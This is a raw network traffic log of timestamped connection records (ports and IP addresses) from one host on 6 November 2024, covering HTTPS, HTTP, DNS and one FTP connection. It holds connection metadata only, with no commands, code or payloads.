Nov 6, 2024 17:02:58.545706034 CET	443	56916	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.545747995 CET	56916	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.545759916 CET	443	56916	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.545787096 CET	443	56916	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.545826912 CET	56916	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.550126076 CET	56916	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.550138950 CET	443	56916	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.550148964 CET	56916	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.550153971 CET	443	56916	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.553416014 CET	56920	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.553447962 CET	443	56920	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.553523064 CET	56920	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.553761005 CET	56920	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.553772926 CET	443	56920	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.571782112 CET	443	56917	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.572267056 CET	56917	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.572282076 CET	443	56917	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.572770119 CET	56917	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.572777987 CET	443	56917	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.594846010 CET	443	56918	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.595335007 CET	56918	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.595344067 CET	443	56918	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.595820904 CET	56918	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.595824957 CET	443	56918	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.703609943 CET	443	56917	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.703630924 CET	443	56917	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.703676939 CET	443	56917	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.703739882 CET	56917	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.703952074 CET	56917	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.703975916 CET	443	56917	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.703989983 CET	56917	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.703998089 CET	443	56917	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.706732988 CET	56921	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.706765890 CET	443	56921	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.706835985 CET	56921	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.707005024 CET	56921	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.707015038 CET	443	56921	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.723889112 CET	443	56918	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.723903894 CET	443	56918	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.723947048 CET	443	56918	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.724030972 CET	56918	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.724075079 CET	56918	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.724359035 CET	56918	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.724366903 CET	443	56918	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.724378109 CET	56918	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.724383116 CET	443	56918	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.726984978 CET	56922	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.727000952 CET	443	56922	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.727082968 CET	56922	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.727231026 CET	56922	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.727241039 CET	443	56922	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.215281963 CET	80	56919	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:59.216753006 CET	56923	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:59.216805935 CET	443	56923	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:59.217000961 CET	56923	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:59.217187881 CET	56923	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:59.217205048 CET	443	56923	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:59.271066904 CET	56919	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:59.346927881 CET	443	56920	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.347567081 CET	56920	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.347594976 CET	443	56920	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.348041058 CET	56920	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.348047018 CET	443	56920	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.436024904 CET	443	56921	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.436480045 CET	56921	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.436496973 CET	443	56921	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.436991930 CET	56921	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.436996937 CET	443	56921	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.471182108 CET	443	56922	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.471618891 CET	56922	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.471646070 CET	443	56922	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.472076893 CET	56922	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.472081900 CET	443	56922	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.481384993 CET	443	56920	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.481534958 CET	443	56920	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.481586933 CET	56920	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.481658936 CET	56920	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.481673956 CET	443	56920	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.481683969 CET	56920	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.481689930 CET	443	56920	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.484193087 CET	56924	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.484230995 CET	443	56924	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.484297037 CET	56924	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.484419107 CET	56924	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.484428883 CET	443	56924	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.568870068 CET	443	56921	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.568937063 CET	443	56921	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.568989038 CET	56921	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.569226980 CET	56921	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.569251060 CET	443	56921	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.569262028 CET	56921	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.569267035 CET	443	56921	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.573206902 CET	56925	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.573256969 CET	443	56925	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.573328018 CET	56925	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.573466063 CET	56925	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.573482037 CET	443	56925	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.599756002 CET	443	56922	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.599809885 CET	443	56922	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.599858999 CET	56922	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.600049973 CET	56922	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.600069046 CET	443	56922	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.600079060 CET	56922	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.600085974 CET	443	56922	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.605267048 CET	56926	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.605295897 CET	443	56926	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.605351925 CET	56926	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.605669022 CET	56926	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:59.605679989 CET	443	56926	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:59.866425991 CET	443	56923	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:59.868240118 CET	56923	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:59.868268967 CET	443	56923	188.114.96.3	192.168.2.6
Nov 6, 2024 17:03:00.029211998 CET	443	56923	188.114.96.3	192.168.2.6
Nov 6, 2024 17:03:00.029318094 CET	443	56923	188.114.96.3	192.168.2.6
Nov 6, 2024 17:03:00.029367924 CET	56923	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:03:00.033014059 CET	56923	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:03:00.046207905 CET	56919	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:03:00.048017979 CET	56927	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:03:00.051390886 CET	80	56919	193.122.6.168	192.168.2.6
Nov 6, 2024 17:03:00.051459074 CET	56919	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:03:00.052843094 CET	80	56927	193.122.6.168	192.168.2.6
Nov 6, 2024 17:03:00.052927971 CET	56927	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:03:00.053035021 CET	56927	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:03:00.057745934 CET	80	56927	193.122.6.168	192.168.2.6
Nov 6, 2024 17:03:00.236820936 CET	443	56924	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.237489939 CET	56924	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.237517118 CET	443	56924	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.237946987 CET	56924	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.237952948 CET	443	56924	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.300836086 CET	443	56925	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.301597118 CET	56925	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.301630974 CET	443	56925	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.302061081 CET	56925	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.302067995 CET	443	56925	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.360157967 CET	443	56926	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.360678911 CET	56926	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.360724926 CET	443	56926	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.361124992 CET	56926	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.361131907 CET	443	56926	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.388851881 CET	443	56924	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.388959885 CET	443	56924	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.389027119 CET	56924	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.389249086 CET	56924	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.389271021 CET	443	56924	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.389288902 CET	56924	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.389297009 CET	443	56924	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.392033100 CET	56928	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.392072916 CET	443	56928	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.392159939 CET	56928	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.392328024 CET	56928	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.392339945 CET	443	56928	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.432415009 CET	443	56925	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.432496071 CET	443	56925	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.432630062 CET	56925	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.432908058 CET	56925	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.432929039 CET	443	56925	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.432945013 CET	56925	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.432950020 CET	443	56925	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.435992002 CET	56929	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.436045885 CET	443	56929	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.436146021 CET	56929	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.436316967 CET	56929	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.436336040 CET	443	56929	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.491626978 CET	443	56926	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.491687059 CET	443	56926	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.491745949 CET	56926	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.491941929 CET	56926	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.491966963 CET	443	56926	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.491986036 CET	56926	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.491993904 CET	443	56926	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.494705915 CET	56930	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.494743109 CET	443	56930	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.494823933 CET	56930	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.494982958 CET	56930	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:00.494996071 CET	443	56930	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:00.894479990 CET	80	56927	193.122.6.168	192.168.2.6
Nov 6, 2024 17:03:00.895714045 CET	56931	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:03:00.895768881 CET	443	56931	188.114.96.3	192.168.2.6
Nov 6, 2024 17:03:00.895864964 CET	56931	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:03:00.896275043 CET	56931	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:03:00.896285057 CET	443	56931	188.114.96.3	192.168.2.6
Nov 6, 2024 17:03:00.942801952 CET	56927	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:03:01.136322975 CET	443	56928	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.136915922 CET	56928	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.136945009 CET	443	56928	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.137495995 CET	56928	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.137501955 CET	443	56928	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.177329063 CET	443	56929	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.178896904 CET	56929	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.178915024 CET	443	56929	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.180005074 CET	56929	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.180030107 CET	443	56929	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.239891052 CET	443	56930	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.240478039 CET	56930	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.240494013 CET	443	56930	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.240947962 CET	56930	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.240952015 CET	443	56930	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.272285938 CET	443	56928	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.272358894 CET	443	56928	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.272408962 CET	56928	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.272605896 CET	56928	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.272615910 CET	443	56928	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.272625923 CET	56928	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.272629976 CET	443	56928	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.275593996 CET	56932	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.275631905 CET	443	56932	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.275722027 CET	56932	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.275877953 CET	56932	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.275887966 CET	443	56932	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.313963890 CET	443	56929	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.314019918 CET	443	56929	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.314078093 CET	56929	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.314270973 CET	56929	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.314290047 CET	443	56929	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.314301968 CET	56929	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.314306974 CET	443	56929	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.317022085 CET	56933	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.317054987 CET	443	56933	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.317138910 CET	56933	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.317315102 CET	56933	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.317329884 CET	443	56933	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.371537924 CET	443	56930	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.371603012 CET	443	56930	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.371676922 CET	56930	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.371918917 CET	56930	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.371934891 CET	443	56930	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.371968985 CET	56930	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.371974945 CET	443	56930	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.374911070 CET	56934	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.374946117 CET	443	56934	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.375031948 CET	56934	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.375185013 CET	56934	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:01.375195026 CET	443	56934	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:01.481854916 CET	50089	53	192.168.2.6	162.159.36.2
Nov 6, 2024 17:03:01.487360001 CET	53	50089	162.159.36.2	192.168.2.6
Nov 6, 2024 17:03:01.487435102 CET	50089	53	192.168.2.6	162.159.36.2
Nov 6, 2024 17:03:01.487472057 CET	50089	53	192.168.2.6	162.159.36.2
Nov 6, 2024 17:03:01.492873907 CET	53	50089	162.159.36.2	192.168.2.6
Nov 6, 2024 17:03:01.532429934 CET	443	56931	188.114.96.3	192.168.2.6
Nov 6, 2024 17:03:01.534140110 CET	56931	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:03:01.534182072 CET	443	56931	188.114.96.3	192.168.2.6
Nov 6, 2024 17:03:01.692761898 CET	443	56931	188.114.96.3	192.168.2.6
Nov 6, 2024 17:03:01.692863941 CET	443	56931	188.114.96.3	192.168.2.6
Nov 6, 2024 17:03:01.693047047 CET	56931	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:03:01.693792105 CET	56931	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:03:02.009248018 CET	443	56932	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.009661913 CET	56932	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.009679079 CET	443	56932	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.010184050 CET	56932	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.010190964 CET	443	56932	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.356117010 CET	53	50089	162.159.36.2	192.168.2.6
Nov 6, 2024 17:03:02.356817007 CET	50089	53	192.168.2.6	162.159.36.2
Nov 6, 2024 17:03:02.357727051 CET	443	56933	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.358171940 CET	56933	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.358186007 CET	443	56933	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.358697891 CET	56933	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.358707905 CET	443	56933	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.358971119 CET	443	56934	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.359632015 CET	56934	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.359632015 CET	56934	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.359642029 CET	443	56934	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.359654903 CET	443	56934	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.359947920 CET	53	50089	162.159.36.2	192.168.2.6
Nov 6, 2024 17:03:02.359997988 CET	50089	53	192.168.2.6	162.159.36.2
Nov 6, 2024 17:03:02.364434004 CET	53	50089	162.159.36.2	192.168.2.6
Nov 6, 2024 17:03:02.364485025 CET	50089	53	192.168.2.6	162.159.36.2
Nov 6, 2024 17:03:02.481574059 CET	443	56932	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.481734991 CET	443	56932	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.481820107 CET	56932	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.481933117 CET	56932	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.481942892 CET	443	56932	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.481954098 CET	56932	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.481959105 CET	443	56932	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.484494925 CET	50091	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.484508991 CET	443	50091	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.484590054 CET	50091	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.484898090 CET	50091	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.484908104 CET	443	50091	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.490379095 CET	443	56933	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.490406036 CET	443	56933	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.490441084 CET	443	56933	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.490472078 CET	56933	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.490494013 CET	56933	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.490572929 CET	56933	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.490588903 CET	443	56933	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.490597963 CET	56933	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.490603924 CET	443	56933	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.491560936 CET	443	56934	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.492151022 CET	443	56934	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.492209911 CET	56934	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.492248058 CET	56934	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.492252111 CET	443	56934	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.492270947 CET	56934	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.492275000 CET	443	56934	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.492654085 CET	50092	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.492696047 CET	443	50092	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.492748976 CET	50092	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.492914915 CET	50092	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.492932081 CET	443	50092	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.493983030 CET	50093	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.493999004 CET	443	50093	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:02.494062901 CET	50093	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.494162083 CET	50093	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:02.494170904 CET	443	50093	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.002928972 CET	56905	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:03:03.003652096 CET	50094	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:03.008518934 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:03.008594036 CET	80	56905	193.122.6.168	192.168.2.6
Nov 6, 2024 17:03:03.008594036 CET	50094	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:03.008655071 CET	56905	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:03:03.251116991 CET	443	50091	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.251971960 CET	50091	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.251993895 CET	443	50091	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.252208948 CET	443	50092	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.252449989 CET	50091	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.252459049 CET	443	50091	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.252664089 CET	50092	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.252697945 CET	443	50092	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.253020048 CET	50092	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.253026962 CET	443	50092	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.260751963 CET	443	50093	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.261207104 CET	50093	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.261241913 CET	443	50093	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.261605978 CET	50093	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.261614084 CET	443	50093	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.386154890 CET	443	50091	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.386255026 CET	443	50091	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.386368990 CET	443	50091	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.386406898 CET	50091	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.386452913 CET	50091	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.386657953 CET	50091	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.386681080 CET	443	50091	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.386691093 CET	50091	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.386696100 CET	443	50091	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.387506008 CET	443	50092	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.387778044 CET	443	50092	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.387867928 CET	50092	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.388093948 CET	50092	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.388115883 CET	443	50092	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.388130903 CET	50092	443	192.168.2.6	13.107.246.45
